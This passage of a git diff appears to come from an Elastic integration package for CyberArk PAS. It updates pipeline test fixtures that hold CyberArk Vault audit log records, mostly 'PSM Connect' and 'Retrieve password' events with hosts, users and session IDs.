\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:28\",\"IsoTimestamp\":\"2021-03-11T16:50:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}",
 "code": "295",
 "kind": "event",
@@ -1222,7 +1222,7 @@
 "event": {
 "severity": 2,
 "reason": "sdfsdf",
- "ingested": "2021-06-09T10:24:30.560376900Z",
+ "ingested": "2021-12-09T13:36:45.560180100Z",
 "original": "\u003c5\u003e1 2021-03-11T16:54:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:54:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:54:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003esdfsdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMApp_VAGRANT\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"centos8\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:54:20\",\"IsoTimestamp\":\"2021-03-11T16:54:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"sdfsdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"PSMApp_VAGRANT\"},{\"Name\":\"Address\",\"Value\":\"centos8\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}",
 "code": "295",
 "kind": "event",
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log
index 74928df0a23..ce2f13e9d7d 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log
@@ -1,17 +1,17 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"300","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM 
Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n 
Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n 